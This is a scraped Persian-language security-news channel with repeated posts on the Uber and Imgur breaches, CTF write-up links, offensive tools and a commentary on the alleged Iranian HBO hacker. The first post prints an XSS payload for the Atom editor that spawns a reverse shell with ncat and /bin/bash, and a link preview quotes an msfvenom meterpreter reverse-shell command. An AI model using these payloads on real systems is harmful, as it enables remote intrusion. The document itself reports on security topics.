امنیت اطلاعات
باگ xss در برنامه atom که منجر به اجرای دستور از راه دور میشود! <script> https://window.top .require('child_process').execFile('/usr/bin/xterm',['-e', 'ncat 127.0.0.1 4242 -e /bin/bash']); </script> #atom #rce #xss #dev @sec_Nerd
*XSS via different extensions
*SSI in IIS
*RCE in IIS
https://mike-n1.github.io/ExtensionsOverview
#writeup
#xss
#rce
@sec_nerd
*SSI in IIS
*RCE in IIS
https://mike-n1.github.io/ExtensionsOverview
#writeup
#xss
#rce
@sec_nerd
شرکت uber در سال ۲۰۱۶ مورد نفوذ قرار گرفت و اطلاعات شخصی شامل نام، آدرس و شماره تلفن 57 میلیون کاربر این سایت توسط هکرها سرقت شد.
این شرکت برای رسانه ای نکردن این موضوع مبلغ صد هزار دلار به هکرها پرداخت کرد!
https://www.grahamcluley.com/uber-hackers-paid-data-breach/
#uber
#breach
#ransom
@sec_nerd
این شرکت برای رسانه ای نکردن این موضوع مبلغ صد هزار دلار به هکرها پرداخت کرد!
https://www.grahamcluley.com/uber-hackers-paid-data-breach/
#uber
#breach
#ransom
@sec_nerd
Graham Cluley
Uber paid hackers $100,000 to keep data breach quiet
You can ask forgiveness for being hacked, but many people will find it harder to forgive and forget if you deliberately concealed the truth from them.
H1-212 2017: Writeup
رایت آپ با موضوع نفوذ به وب
https://zeta-two.com/ctf/2017/11/20/h1212-writeup.html
#writeup
#ssrf
#web
@sec_nerd
رایت آپ با موضوع نفوذ به وب
https://zeta-two.com/ctf/2017/11/20/h1212-writeup.html
#writeup
#ssrf
#web
@sec_nerd
Zeta-Two
H1-212 2017: Writeup
Hackerone is hosting an event in New York this december and ran a CTF as a secondary way to get an invite to the event.I visited the H1-702 event in Las Vega...
امنیت اطلاعات
Iranian Behzad Mesri charged in HBO hack, ‘Game of Thrones’ script theft بهزاد مصری به عنوان عضوی از گروه هکری Turk Black Hat Security توسط دادگستری ایالات متحده به عنوان مجرم معرفی و تحت پیگرد قرار گرفت. این تیم با ادعای nbc برای ارتش ایران علیه اسراییل…
گزارش فوربس در مورد این هکر و مطالبی که به نقل از فردی به نام کالین اندرسون ، محققی که در دانشگاه کارنگی ملون واشنگتن برروی قابلیتهای سایبری ایران کار میکند!
در ادامه به تناقضات موجود در این گزارش که هر شخصی (حتی با اطلاعات کم از حملات سایبری) را به فکر فرو میبرد، اشاره خواهیم کرد
1-مصری برای سیستم نظامی ایران کار کرده و شبکه های نظامی،هسته ای و زیرساختهای اسراییلی را هدف قرار داده است .
2-کالین اندرسون اشاره میکند که مصری تحت عنوان نام Skot vahshat برای گروه هکرهای TBH اقدام به دیفیس وب سایت میکرده و با احتمال زیاد این حملات با تکنیک های معمولی که تحت عنوان SQL injection شناخته میشوند اهداف را دیفیس کرده است!
3-مصری در فعالیتهای خود ملاحظات امنیتی را مراعات نمیکرده است. زیرا اقدام به درج ایمیل خود در صفحات دیفیس کرده و آدرس وی نیز در اطلاعات کاربری وی در جیمیل موجود است.
4-مصری شبکه HBO را اسکن کرده و به دنبال نقطه ضعفی برای ورود بوده و موفق شده بصورت ریموت وارد حساب کاربری کارکنان و سپس شبکه داخلی شود.این اتفاق بین ماه های می و جولای رخ داده است و اون توانسته اطلاعات شبکه های داخلی این شرکت اعم از قسمتهایی از سریال GOT و شوهای تلویزیونی مانند Curb Your Enthusiasm و The Deuce را نیز بدست آورد!
5-آدام میرز از CrowdStrike نیز گفته است «دلیلی وجود ندارد که باور کنیم این شخص یک هکر نخبه بوده است!»
6-باز هم با نقل قول از میرز میگوید: ایران کره شمالی نیست،ایرانی بودن این فرد دلیلی بر نقش حکومت ایران در این حمله نمیباشد. (کره شمالی پیش از این کمپانی سونی را هک کرده بود)
https://www.forbes.com/sites/thomasbrewster/2017/11/21/basic-hacker-or-elite-cyber-spy-feds-say-this-iranian-tried-to-extort-hbo-for-6bn/
#hbo
#got7
#iran
#usa
@sec_nerd
در ادامه به تناقضات موجود در این گزارش که هر شخصی (حتی با اطلاعات کم از حملات سایبری) را به فکر فرو میبرد، اشاره خواهیم کرد
1-مصری برای سیستم نظامی ایران کار کرده و شبکه های نظامی،هسته ای و زیرساختهای اسراییلی را هدف قرار داده است .
2-کالین اندرسون اشاره میکند که مصری تحت عنوان نام Skot vahshat برای گروه هکرهای TBH اقدام به دیفیس وب سایت میکرده و با احتمال زیاد این حملات با تکنیک های معمولی که تحت عنوان SQL injection شناخته میشوند اهداف را دیفیس کرده است!
3-مصری در فعالیتهای خود ملاحظات امنیتی را مراعات نمیکرده است. زیرا اقدام به درج ایمیل خود در صفحات دیفیس کرده و آدرس وی نیز در اطلاعات کاربری وی در جیمیل موجود است.
4-مصری شبکه HBO را اسکن کرده و به دنبال نقطه ضعفی برای ورود بوده و موفق شده بصورت ریموت وارد حساب کاربری کارکنان و سپس شبکه داخلی شود.این اتفاق بین ماه های می و جولای رخ داده است و اون توانسته اطلاعات شبکه های داخلی این شرکت اعم از قسمتهایی از سریال GOT و شوهای تلویزیونی مانند Curb Your Enthusiasm و The Deuce را نیز بدست آورد!
5-آدام میرز از CrowdStrike نیز گفته است «دلیلی وجود ندارد که باور کنیم این شخص یک هکر نخبه بوده است!»
6-باز هم با نقل قول از میرز میگوید: ایران کره شمالی نیست،ایرانی بودن این فرد دلیلی بر نقش حکومت ایران در این حمله نمیباشد. (کره شمالی پیش از این کمپانی سونی را هک کرده بود)
https://www.forbes.com/sites/thomasbrewster/2017/11/21/basic-hacker-or-elite-cyber-spy-feds-say-this-iranian-tried-to-extort-hbo-for-6bn/
#hbo
#got7
#iran
#usa
@sec_nerd
Forbes
Feds Say This Iranian Hacker Tried To Extort HBO For $6 Million -- Here's What We Know About Him
Here's everything we know about the alleged HBO hacker...
امنیت اطلاعات
گزارش فوربس در مورد این هکر و مطالبی که به نقل از فردی به نام کالین اندرسون ، محققی که در دانشگاه کارنگی ملون واشنگتن برروی قابلیتهای سایبری ایران کار میکند! در ادامه به تناقضات موجود در این گزارش که هر شخصی (حتی با اطلاعات کم از حملات سایبری) را به فکر فرو…
این تحلیل از سوی ادمین های این کانال ارائه شده و قضاوتی در مورد اینکه اصلا این هک توسط ایرانی ها انجام شده یا فردی به اسم مصری وجود خارجی داشته یا خیر و یا حتی توانمندیهای این هکر و یا سایر هکرهای ایرانی نخواهیم داشت.
تناقضاتی در سخنان امریکایی ها وجود دارد که به برخی از آنها اشاره میکنیم:
این گزارش بر این اساس که این حمله توسط یک هکر و دیفیسر ایرانی انجام شده شکل گرفته و ذهنیت کارشناسان این گزارش و نویسنده با این تفکر (ضعیف شمردن) مطلب را پیش میبرد.
از جمله این تناقضات میتوان به نام بردن از حمله SQL injection به عنوان یک حمله معمولی اشاره کرد در حالی که این حمله در وبسایت OWASP در رده نخست حملات و در تمام حملات سایبری وب جزو خطرناکترین و موثرترین حملات است و وبسایتهای بزرگی مانند فیسبوک، یاهو، فلیکر و ... با این آسیب پذیری روبرو بوده اند!
کارشناس مذکور اشاره میکند ، این هکر که بنظر نمیرسد توانایی زیادی داشته باشد با اسکن شبکه و ورود به شبکه داخلی و دانلود هرچه که ارزشمند بوده (اطلاعات شخصی بازیگران نیز در این حمله سرقت شده) ، باز هم اسکریپت کید است! اولین فکری که به ذهن هر شخصی میرسد تعریف حمله سایبری است که معمولا دستیابی به شبکه داخلی، یک هدف بسیار مهم برای هر هکری است که مصری موفق به انجام آن شده است.پس استفاده از لفظ اسکریپت کید نشان از عدم تحمل وقوع این حمله توسط هکرهای ایرانی دارد.
اگر بخواهیم بدون طرفداری از دو طرف این قضیه فکر کنیم و نظر بدهیم خواهیم دید که این حمله یک حمله ساده نبوده و نفوذ به شبکه داخلی شرکتی مانند HBO به آسانی اسکن کردن و ورود به حساب کاربری کارکنان و سپس شبکه داخلی نیست و این گزارش نشان از عدم تحمل کارشناسان امریکایی در پی بروز چنین حملاتی به وب سایتهای آنان دارد.
#hbo
#got7
#iran
#usa
@sec_nerd
تناقضاتی در سخنان امریکایی ها وجود دارد که به برخی از آنها اشاره میکنیم:
این گزارش بر این اساس که این حمله توسط یک هکر و دیفیسر ایرانی انجام شده شکل گرفته و ذهنیت کارشناسان این گزارش و نویسنده با این تفکر (ضعیف شمردن) مطلب را پیش میبرد.
از جمله این تناقضات میتوان به نام بردن از حمله SQL injection به عنوان یک حمله معمولی اشاره کرد در حالی که این حمله در وبسایت OWASP در رده نخست حملات و در تمام حملات سایبری وب جزو خطرناکترین و موثرترین حملات است و وبسایتهای بزرگی مانند فیسبوک، یاهو، فلیکر و ... با این آسیب پذیری روبرو بوده اند!
کارشناس مذکور اشاره میکند ، این هکر که بنظر نمیرسد توانایی زیادی داشته باشد با اسکن شبکه و ورود به شبکه داخلی و دانلود هرچه که ارزشمند بوده (اطلاعات شخصی بازیگران نیز در این حمله سرقت شده) ، باز هم اسکریپت کید است! اولین فکری که به ذهن هر شخصی میرسد تعریف حمله سایبری است که معمولا دستیابی به شبکه داخلی، یک هدف بسیار مهم برای هر هکری است که مصری موفق به انجام آن شده است.پس استفاده از لفظ اسکریپت کید نشان از عدم تحمل وقوع این حمله توسط هکرهای ایرانی دارد.
اگر بخواهیم بدون طرفداری از دو طرف این قضیه فکر کنیم و نظر بدهیم خواهیم دید که این حمله یک حمله ساده نبوده و نفوذ به شبکه داخلی شرکتی مانند HBO به آسانی اسکن کردن و ورود به حساب کاربری کارکنان و سپس شبکه داخلی نیست و این گزارش نشان از عدم تحمل کارشناسان امریکایی در پی بروز چنین حملاتی به وب سایتهای آنان دارد.
#hbo
#got7
#iran
#usa
@sec_nerd
امنیت اطلاعات
H1-212 2017: Writeup رایت آپ با موضوع نفوذ به وب https://zeta-two.com/ctf/2017/11/20/h1212-writeup.html #writeup #ssrf #web @sec_nerd
رایت آپ همین CTF با روشی دیگر توسط فردی دیگر
https://10degres.net/ctf-h1-212/
#writeup
#ssrf
#web
@sec_nerd
https://10degres.net/ctf-h1-212/
#writeup
#ssrf
#web
@sec_nerd
Gwendal Le Coguic
Fail at CTF h1-212 - The Evil Job
Gwendal Le Coguic, web developer and security researcher
ابزار RDPY برای نفوذ به ریموت دسکتاپ
https://www.darknet.org.uk/2017/11/rdpy-rdp-security-tool-hacking-remote-desktop-protocol/
#rdp
#windows
@sec_nerd
https://www.darknet.org.uk/2017/11/rdpy-rdp-security-tool-hacking-remote-desktop-protocol/
#rdp
#windows
@sec_nerd
تولید اسکریپتهای پاورشل با استفاده از msfvenom در ویندوز
https://blog.didierstevens.com/2017/08/16/generating-powershell-scripts-with-msfvenom-on-windows/
#windows
#msfvenom
#Ps
#network
#pentest
@sec_nerd
https://blog.didierstevens.com/2017/08/16/generating-powershell-scripts-with-msfvenom-on-windows/
#windows
#msfvenom
#Ps
#network
#pentest
@sec_nerd
Didier Stevens
Generating PowerShell Scripts With MSFVenom On Windows
To generate a PowerShell script with msfvenom on Windows, use the command “msfvenom.bat –payload windows/x64/meterpreter_reverse_http –format psh –out meterpreter-64.ps1 LHO…
امنیت اطلاعات
فایرفاکس در جدیدترین و جالبترین امکان خود به شما میگوید که سایتی که بازدید میکنید پیش از این مورد حمله سایبری قرار گرفته است! #firefox #breach @sec_nerd
فایرفاکس برای ایجاد این قابلیت با وبسایت haveibeenpwned.com همکاری میکند.
#haveibeenpwned
#firefox
#breach
@sec_nerd
#haveibeenpwned
#firefox
#breach
@sec_nerd
ابزار 3vilTwinAttacker برای ساخت کانکشن وای فای فیک و اجرای حمله MITM
https://n0where.net/rogue-wi-fi-access-point-3viltwinattacker/
#wifi
#rogue
#mitm
@sec_nerd
https://n0where.net/rogue-wi-fi-access-point-3viltwinattacker/
#wifi
#rogue
#mitm
@sec_nerd
حساب مادام العمر shodan به مناسبت جمعه سیاه ۵ دلار!
https://www.shodan.io/store/member
#shodan
#black_friday
@sec_nerd
https://www.shodan.io/store/member
#shodan
#black_friday
@sec_nerd
وب سایت imgur در سال 2014 هک شد و مسئولان این سایت اخیرا این هک را تایید کرده اند.
این حمله منجر به لو رفتن اطلاعات یک میلیون و هفتصدهزار کاربر این سایت شد.
پسوردهای کاربران با الگوریتم sha-256 هش شده و تروی هانت، مالک وبسایت haveibeenpwned.com نیز دریافت اطلاعات کاربران imgur را تایید کرده است.
https://www.hackread.com/imgur-was-hacked-in-2014-affecting-1-7m-users/
#breach
#imgur
@sec_nerd
این حمله منجر به لو رفتن اطلاعات یک میلیون و هفتصدهزار کاربر این سایت شد.
پسوردهای کاربران با الگوریتم sha-256 هش شده و تروی هانت، مالک وبسایت haveibeenpwned.com نیز دریافت اطلاعات کاربران imgur را تایید کرده است.
https://www.hackread.com/imgur-was-hacked-in-2014-affecting-1-7m-users/
#breach
#imgur
@sec_nerd
HackRead
Imgur was hacked in 2014; affecting 1.7M users
It's just another day with just another data breach - This time it is Image-sharing website Imgur. The online image sharing and hosting platform Imgur has